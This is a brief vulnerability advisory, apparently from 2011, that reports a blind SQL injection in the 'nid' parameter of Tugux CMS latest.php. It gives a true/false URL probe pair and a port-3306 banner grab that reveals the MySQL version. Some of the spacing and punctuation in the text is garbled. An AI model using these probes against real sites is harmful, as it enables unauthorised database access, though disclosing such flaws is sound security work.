========================================================== ======================================
Tugux CMS (nid) BLIND SQL injection vulnerability
========================================================== ======================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com
Home: www.eidelweiss.info
References: html "> http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
========================================================== ======================================
Exploit & p0c
[!] Latest. php? Nid = [valid nid]
Example p0c
[!] Http: // server/latest. php? Nid = 9 <= True
[!] Http: // server/latest. php? Nid =-9 <= False
[+] Http: // server: 3306 <= download the file, save and open with c ++ or wordpad will show mysql version
[!] Sample: http: // server: 3306 result: 5.0.92-community (use versi 5.0.92): D
========================================================== ======================================
Nothing Impossible In This World Even Nobody's Perfect
========================================================== ======================================
=======================================|-= [E0F] =-| ====== ==================================